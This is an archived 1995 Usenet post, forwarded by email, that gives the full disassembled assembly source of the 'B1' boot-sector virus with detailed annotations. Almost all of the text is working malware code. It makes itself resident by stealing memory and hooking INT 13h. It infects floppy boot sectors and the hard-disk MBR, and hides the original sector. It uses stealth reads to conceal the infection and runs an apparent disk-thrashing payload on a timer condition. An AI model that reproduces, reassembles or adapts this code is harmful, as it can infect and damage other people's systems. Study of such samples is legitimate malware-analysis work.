MalwareSourceCode/MSDOS/B-Index/Virus.MSDOS.Unknown.b1.asm



From smtp Tue Feb 7 13:16 EST 1995
Received: from lynx.dac.neu.edu by POBOX.jwu.edu; Tue, 7 Feb 95 13:16 EST
Received: by lynx.dac.neu.edu (8.6.9/8.6.9)
id NAA01723 for joshuaw@pobox.jwu.edu; Tue, 7 Feb 1995 13:19:13 -0500
Date: Tue, 7 Feb 1995 13:19:13 -0500
From: lynx.dac.neu.edu!ekilby (Eric Kilby)
Content-Length: 10347
Content-Type: binary
Message-Id: <199502071819.NAA01723@lynx.dac.neu.edu>
To: pobox.jwu.edu!joshuaw
Subject: (fwd) B1
Newsgroups: alt.comp.virus
Status: O
Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
From: danishm@iia.org ()
Newsgroups: alt.comp.virus
Subject: B1
Date: 5 Feb 1995 22:05:37 GMT
Organization: International Internet Association.
Lines: 330
Message-ID: <3h3i3h$v4@ankh.iia.org>
NNTP-Posting-Host: iia.org
X-Newsreader: TIN [version 1.2 PL2]
Here is the B1 virus:
PAGE 59,132
; Disassembled using sourcer
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
;[[ [[
;[[ B1 [[
;[[ [[
;[[ Created: 8-Jan-95 [[
;[[ Version: [[
;[[ Code type: zero start [[
;[[ Passes: 5 Analysis Options on: none [[
;[[ [[
;[[ [[
;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
; BIOS data area locations the virus touches.  All three are accessed with
; ds = 0 (the code explicitly zeroes ds before each use).
data_1e equ 413h ; (0000:0413=7Fh) base memory size in KB; sub_1 decrements it by 1 to carve out a hidden kilobyte for the resident copy
data_2e equ 46Dh ; (0000:046D=17E1h) presumably the middle word of the BIOS timer tick dword at 0000:046C; read once per write request as the payload gate (and ax,178Fh)
data_3e equ 4Ch ; (0006:004C=0DAh) 4 * 13h = INT 13h vector; sub_1 saves it into the resident copy and then replaces it
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 0
virus proc far
; 512-byte boot-sector / MBR image of the "B1" virus.  Two entry points:
;   offset 0000h (start): executed by the BIOS at boot; jumps to loc_2,
;                         which goes resident via sub_1 and re-enters the
;                         copy at loc_13 (see sub_1 / loc_13).
;   offset 0044h:         the resident INT 13h handler.  sub_1 stores 0044h
;                         as the new INT 13h offset; that is the 'push ax'
;                         directly after 'call sub_1' below.
; Offsets 0002h-003Fh are not virus code: sub_5 copies only the first word
; (the jmp) plus 0040h-01BBh into a victim, so the victim's BPB stays intact.
start:
jmp short loc_2 ; (0040) skip the OEM/BPB area below
; Residual bytes from the carrier sector: OEM name field, then a BPB that
; describes a 1.44 MB floppy (200h bytes/sector, 1 sector/cluster, 1 reserved
; sector, 2 FATs, 0E0h = 224 root entries, 0B40h = 2880 sectors, media 0F0h,
; 9 sectors/FAT, 12h = 18 sectors/track, 2 heads).  sub_3 reads [11h], [16h],
; [18h] and [1Ah] of a buffered sector at exactly these BPB offsets.
db 90h, 00h, 4Dh, 4Dh, 49h, 00h
db 33h, 2Eh, 33h, 00h, 02h, 01h
db 01h, 00h, 02h,0E0h, 00h, 40h
db 0Bh,0F0h, 09h, 00h, 12h, 00h
db 02h, 00h
db 19 dup (0)
db 12h, 00h, 00h, 00h, 00h, 01h
; 0FAh 33h 0C0h 8Eh 0D0h 0BCh 00h 7Ch 16h 07h decode to
; cli / xor ax,ax / mov ss,ax / mov sp,7C00h / push ss / pop es - the
; opening of a DOS boot sector left over from the carrier.  Never executed.
db 00h,0FAh, 33h,0C0h, 8Eh,0D0h
db 0BCh, 00h, 7Ch, 16h, 07h
loc_2:
; --- boot-time entry (offset 0040h) ---
; 'push cs' + near call: sub_1 pops the near return address to learn its own
; load offset and finishes with a retf into the high-memory copy, so control
; does not come back to the 'push ax' below in the boot flow.
push cs
call sub_1 ; (00EF) go resident
; --- INT 13h handler entry (offset 0044h) ---
; Stack on entry: [flags][cs][ip] pushed by INT.  Only AH=02h (read) and
; AH=03h (write) are intercepted; all other functions chain to the original
; handler at loc_14.
push ax
shr ax,1 ; Shift w/zeros fill: AH >>= 1; original AH bit 0 (0=read, 1=write) lands in AL bit 7
dec ah ; AH was 2 or 3 -> 0
jz loc_3 ; Jump if zero: read/write request
jmp loc_14 ; (01BA) anything else: pass straight through
loc_3:
push bx
push cx
push dx
push es
push si
push di
push ds
push bp
mov bp,sp ; frame: [bp+0Eh]=bx [bp+0Ch]=cx [bp+0Ah]=dx [bp+8]=es [bp+10h]=ax [bp+12h]=ip [bp+14h]=cs [bp+16h]=flags (see sub_7)
or ch,ch ; Zero ? cylinder low byte 0 ?
jnz loc_5 ; Jump if not zero: not cylinder 0, service the request unchanged
shl al,1 ; Shift w/zeros fill: CF = AL bit 7 = original AH bit 0 (1 = write)
jc loc_4 ; Jump if carry Set: writes skip infection and go to the stealth check
; Read of a cylinder-0 sector: first make sure drive dl is infected.
call sub_6 ; (0190) es=cs, ax=0201h, bx=0200h, cx=1, dh=0 -> read C0/H0/S1 into the 512-byte buffer at cs:0200h
call sub_4 ; (017B) through the original INT 13h; dl is still the caller's drive
jc loc_7 ; Jump if carry Set: read failed - the virus's own error is returned and the caller's request is never issued
call sub_2 ; (0127) compare 0040h-007Fh of self with the same offsets in the buffer
jz loc_4 ; Jump if zero: already infected
call sub_6 ; (0190) reset es/ax/bx/cx/dh again
call sub_3 ; (013B) cx/dh = hiding place for the original sector, derived from the buffered BPB
jz loc_5 ; Jump if zero: no usable location, just do the caller's request
inc ah ; ax = 0301h: write
call sub_4 ; (017B) write the original boot sector to the hiding place
jc loc_5 ; Jump if carry Set
call sub_5 ; (0182) overlay virus code (word 0 and 0040h-01BBh) onto the buffered sector; si=0, di=0200h were left by sub_2
call sub_6 ; (0190)
inc ah ; ax = 0301h: write
call sub_4 ; (017B) write the infected sector back to C0/H0/S1
loc_4:
; Stealth: is the caller's own request for C0/H0/S1 of drive dl?
call sub_7 ; (019E) restore the caller's ax,bx,cx,dx,es from the frame
or ch,dh ; ch|dh == 0 (cylinder low byte 0, head 0) ...
dec cx ; ... and cx == 1 (sector 1, cylinder high bits 0)
jnz loc_5 ; Jump if not zero: not the boot sector, normal service
call sub_6 ; (0190)
call sub_4 ; (017B) read the real C0/H0/S1 into cs:0200h
jc loc_7 ; Jump if carry Set
call sub_2 ; (0127) infected?
jnz loc_5 ; Jump if not zero: clean disk, normal service
call sub_7 ; (019E) caller's registers again
call sub_3 ; (013B) cx/dh = where the original sector is hidden
dec byte ptr [bp+10h] ; saved AL (sector count) -= 1; sub_7 reloads it from here
jz loc_6 ; Jump if zero: one-sector request - serve it entirely from the hidden copy (both reads and writes are redirected)
; Multi-sector request: first sector from the hidden copy, the rest from
; sector 2 onward through the original handler.
mov al,1 ; one sector; AH is still the caller's 02h/03h
call sub_4 ; (017B)
jc loc_7 ; Jump if carry Set
call sub_7 ; (019E) caller's registers, AL already decremented
add bx,di ; es:bx += 0200h (di = 0200h from sub_2): next buffer slot
inc cl ; continue from sector 2 (cx was reloaded as the caller's 0001h)
jmp short loc_6 ; (00BA)
loc_5:
call sub_7 ; (019E) caller's registers unchanged
loc_6:
call sub_4 ; (017B) run the (possibly redirected) request through the original handler
loc_7:
; Return path: hand the BIOS result flags and AX back to the caller.
pushf ; Push flags
pop bx
mov [bp+16h],bx ; flags image that IRET will restore
xchg ax,[bp+10h] ; store result AX; ax = caller's original AX
shr ah,1 ; Shift w/zeros fill: CF = original AH bit 0
jnc loc_9 ; Jump if carry=0: was a read (AH=02h), done
; Payload gate, evaluated only after write requests: proceeds when the
; masked word at 0000:046Dh (BIOS tick count area) is zero.
xor ax,ax ; Zero register
mov ds,ax
mov ax,ds:data_2e ; (0000:046D=17E1h)
and ax,178Fh
jnz loc_9 ; Jump if not zero
call sub_6 ; (0190) ax=0201h, bx=0200h, cx=1, dh=0, es=cs; dl still the caller's drive
loc_8:
; Appears to be a head-thrashing loop: read one sector into cs:0200h, then
; 'xor cx,0FFC0h' toggles ch and bits 6-7 of cl (cylinder 0 <-> 1023, sector
; unchanged) and read again.  The loop only exits when the BIOS returns a
; status byte with bit 7 set ('shl ax,1' moves AH bit 7 into CF); ax is
; re-pushed each pass so the command stays 0201h.
push ax
call sub_4 ; (017B)
xor cx,0FFC0h
nop ;*ASM fixup - sign extn byte (Sourcer padding so the reassembled bytes keep the original offsets; cs:[1BCh] and 1AEh are hard-coded)
shl ax,1 ; Shift w/zeros fill: CF = bit 7 of the BIOS status byte
pop ax
jnc loc_8 ; Jump if carry=0: keep seeking
loc_9:
pop bp
pop ds
pop di
pop si
pop es
pop dx
pop cx
pop bx
pop ax ; result AX written to [bp+10h] above
iret ; Interrupt return, with the flags stored at [bp+16h]
virus endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_1 proc near
; Go resident.  Called once from loc_2 as 'push cs / call sub_1'.  It never
; returns to loc_2: it ends with a retf into the high-memory copy at
; hiseg:01AEh (the 'inc cx' before loc_13) and leaves cs:start_offset on the
; stack for the retf at the end of loc_13.
; Steps: take 1 KB off the top of conventional memory (BIOS word 0000:0413),
; copy the virus there, save the current INT 13h vector into the copy at
; 01BCh (the operand of the far jmp at loc_14 and the target of sub_4), and
; point INT 13h at hiseg:0044h.
mov bx,44h ; 44h = offset of the INT 13h handler entry; also the distance from 'start' to the near return address
mov dx,80h ; dl = 80h (first hard disk), dh = 0 - consumed by loc_13 after the retf
mov si,data_1e ; (0000:0413=7Fh) base memory size in KB
xor di,di ; Zero register
mov ds,di ; ds = 0
dec word ptr [si] ; base memory -= 1 KB: the top kilobyte disappears from the BIOS/DOS view
lodsw ; String [si] to ax: ax = new size in KB
pop si ; si = near return address = offset of the 'push ax' at 0044h within cs
mov cl,6
shl ax,cl ; Shift w/zeros fill: KB * 64 paragraphs = segment of the stolen kilobyte ("hiseg")
mov es,ax ; es = hiseg
sub si,bx ; si = offset of the sector start within cs (0 if loaded at 07C0:0000, 7C00h if at 0000:7C00)
push si ; -> IP for the final retf in loc_13
push ax ; -> CS (hiseg) for the retf below
mov ax,1AEh
push ax ; -> IP for the retf below: 'inc cx' at 01AEh, then loc_13
push cs ; -> es, popped below
push si ; -> bx, popped below
push cs
pop ds ; ds = cs
call sub_5 ; (0182) copy word 0 and 0040h-01BBh from cs:si to hiseg:0000 (di = 0); leaves di = 01BCh, cx = 0
mov ds,cx ; ds = 0 (cx is 0 after sub_5's rep movsb)
mov si,data_3e ; (0006:004C=0DAh) si = 4Ch: INT 13h vector at 0000:004C
mov cl,2
rep movsw ; Rep when cx >0 Mov [si] to es:[di]: old INT 13h vector -> hiseg:01BCh..01BFh; si ends at 50h
mov [si-4],bx ; 0000:004C = 0044h: new INT 13h offset
mov [si-2],es ; 0000:004E = hiseg: new INT 13h segment
pop bx ; bx = sector start offset within cs
pop es ; es = cs: es:bx = where this boot sector is currently loaded (read target for loc_13)
retf ; Return far: to hiseg:01AEh, continuing at loc_13 inside the resident copy
sub_1 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_2 proc near
; Infection check: compares 40h bytes of the virus's own code at cs:0040h
; with the bytes at the same offsets of the sector buffered at es:bx
; (bx = 0200h and es = cs when called from the handler).
; In:  bx = buffer offset; ch must already be 0 (only cl is loaded here -
;      satisfied because sub_6 set cx = 1 just before every call).
; Out: ZF = 1 if the buffered sector carries the virus; ds = cs; si = 0,
;      di = bx (sub_5 and the stealth path rely on these values).
cld ; Clear direction
push cs
pop ds ; ds = cs
xor si,si ; Zero register
mov di,bx
mov cl,40h ; '@' compare 40h bytes
push si
push di
add si,cx ; si = 0040h: start of the code that sub_5 copies into victims
add di,cx ; di = bx + 40h
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]: ZF = 1 only if all 40h bytes match
pop di ; di = bx
pop si ; si = 0
retn ; flags from cmpsb survive the pops
sub_2 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_3 proc near
; Choose the sector in which the original boot sector is hidden.
; In:  dl = drive (bit 7 set = hard disk); di -> buffered boot sector whose
;      BPB is read at the standard offsets; ax is preserved.
; Out: cx = cylinder/sector and dh = head in INT 13h format, ZF = 0 on
;      success; cx = 0 with ZF = 1 when the BPB values would overflow.
; Hard disk: fixed cylinder 0 / head 0 / sector 17 (11h).
; Floppy: linear sector 2*SectorsPerFAT + RootEntries/16, counted from the
; boot sector - with 1 reserved sector that is the last sector of the root
; directory.  The FAT count at [di+10h] is not consulted; 2 FATs and
; 512-byte sectors are assumed.  Converted to C/H/S with SectorsPerTrack
; and Heads from the BPB.
push ax
xor dh,dh ; Zero register: head 0
test dl,80h ; hard disk ?
jz loc_10 ; Jump if zero: floppy
mov cx,11h ; hard disk: cylinder 0, sector 17 (ZF still 0 from the test)
jmp short loc_11 ; (0175)
loc_10:
mov ax,[di+11h] ; BPB root directory entries
mov cl,4
shr ax,cl ; Shift w/zeros fill: / 16 = root directory sectors (32-byte entries, 512-byte sectors)
mov cx,ax
mov ax,[di+16h] ; BPB sectors per FAT
shl ax,1 ; Shift w/zeros fill: * 2 FATs (assumed, not read from the BPB)
jc loc_12 ; Jump if carry Set: overflow
add ax,cx ; ax = linear sector number, boot sector = 0
jc loc_12 ; Jump if carry Set
xor cx,cx ; Zero register
cmp ah,[di+18h] ; quotient would not fit in AL (also catches SectorsPerTrack = 0)
jae loc_12 ; Jump if above or =
div byte ptr [di+18h] ; al,ah rem = ax/data: al = track index, ah = 0-based sector within the track
xchg cl,ah ; cl = sector - 1, ah = 0
cmp ah,[di+1Ah] ; Heads = 0 would fault the next div
jae loc_12 ; Jump if above or =
div byte ptr [di+1Ah] ; al,ah rem = ax/data: al = cylinder, ah = head
mov ch,al ; cylinder (fits a byte because the first div already bounded it)
mov dh,ah ; head
inc cx ; 1-based sector; cx is now non-zero, so ZF = 0
loc_11:
pop ax
retn
loc_12:
xor cx,cx ; Zero register: failure, ZF = 1
jmp short loc_11 ; (0175)
sub_3 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_4 proc near
; Invoke the original INT 13h handler through the vector that sub_1 saved
; at cs:01BCh.  pushf + far call mimics an INT so the handler's IRET lands
; back here; registers and flags on return are the BIOS's.
pushf ; Push flags
call dword ptr cs:[1BCh] ; (7379:01BC=0D79h) saved INT 13h vector
retn
sub_4 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_5 proc near
; Copy the virus image from ds:si to es:di while sparing the BPB area:
; the first word (jmp short loc_2), then 17Ch bytes from offset 0040h
; through 01BBh.  Destination bytes 0002h-003Fh (BPB) and 01BCh-01FFh
; (saved-vector slot, trailing data, 55AAh signature - and on an MBR the
; partition table) are left untouched.
; Out: si and di advanced by 01BCh, cx = 0, direction flag clear.
cld ; Clear direction
movsw ; Mov [si] to es:[di]: the 2-byte jmp at offset 0
mov cx,17Ch
add si,3Eh ; skip to 0040h
add di,3Eh
rep movsb ; Rep when cx >0 Mov [si] to es:[di]: 0040h-01BBh
retn
sub_5 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_6 proc near
; Set up a one-sector read of cylinder 0 / head 0 / sector 1 into the
; virus's buffer: es = cs, ax = 0201h, bx = 0200h, cx = 0001h, dh = 0.
; dl (drive) and all other registers are untouched.  Callers turn the read
; into a write with 'inc ah'.
push cs
mov ax,200h
mov bx,ax ; bx = 0200h: buffer directly after the 512-byte virus image
xor cx,cx ; Zero register
xor dh,dh ; Zero register: head 0
inc cx ; cx = 1: cylinder 0, sector 1
inc ax ; ax = 0201h: read 1 sector
pop es ; es = cs
retn
sub_6 endp
;__________________________________________________________________________
; SUBROUTINE
;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
sub_7 proc near
; Reload the interrupted caller's ax, bx, cx, dx and es from the register
; frame built at loc_3 (bp = sp after the pushes).  [bp+10h] is the AX slot
; that the handler also uses to return its result, and the stealth path
; decrements its low byte (the sector count) before calling this.
mov ax,[bp+10h]
mov bx,[bp+0Eh]
mov cx,[bp+0Ch]
mov dx,[bp+0Ah]
mov es,[bp+8]
retn
sub_7 endp
; ---------------------------------------------------------------------
; Boot-time continuation (01AEh) and INT 13h pass-through (01BAh)
; ---------------------------------------------------------------------
db 41h ; 'inc cx' at 01AEh: the retf target chosen by sub_1; cx was 0 after sub_1's rep movsw, so this yields cylinder 0 / sector 1
loc_13:
; Reached after sub_1's retf with es:bx = original load address of this
; sector, cx = 1, dh = 0, dl = 80h.  Reads C0/H0/S1 of the hard disk and
; then (dl ^= 80h -> 0) of floppy A: into that address, both through the
; now-hooked INT 13h, so each read also runs the infection/stealth logic
; of the handler.  The second pass leaves dl = 80h and falls out to retf,
; which pops cs:start_offset (pushed by sub_1) and executes whatever the
; last successful read put there - presumably the stealth-returned original
; boot sector of whichever drive responded.
mov ax,201h ; read 1 sector
int 13h ; Disk dl=drive a ah=func 02h
; read sectors to memory es:bx (routed through the virus's own handler)
xor dl,80h ; hard disk <-> floppy 0
jz loc_13 ; Jump if zero: first pass done, repeat for drive 0
retf ; Return far: to the re-read boot sector
loc_14:
; Pass-through for INT 13h functions other than 02h/03h: restore ax and
; far-jump to the original handler.  The operand at 01BCh-01BFh is patched
; at boot by sub_1 with the saved vector (and is what sub_4 calls); the
; bytes below are only the values captured in the dumped sample.
pop ax
;* jmp far ptr loc_1 ;*(000A:0D79)
db 0EAh, 79h, 0Dh, 0Ah, 00h
; Remainder of the sector: residual DOS boot-sector strings plus the 55AAh
; signature, carried along but never copied by sub_5 (which stops at 01BBh).
; The file names are 11-byte padded entries ('IBMBIO  COM'); their padding
; spaces appear collapsed in this copy - with 22 bytes here, 55AAh lands at
; offset 01FEh.
db 0Dh, 0Ah, 'Disk Boot failure', 0Dh
db 0Ah, 0
db 'IBMBIO COMIBMDOS COM'
db 18 dup (0)
db 55h,0AAh
seg_a ends
end start
ls virus.asm
ls virus.asm
--
Eric "Mad Dog" Kilby maddog@ccs.neu.edu
The Great Sporkeus Maximus ekilby@lynx.dac.neu.edu
Student at the Northeastern University College of Computer Science
"I Can't Believe It's Not Butter"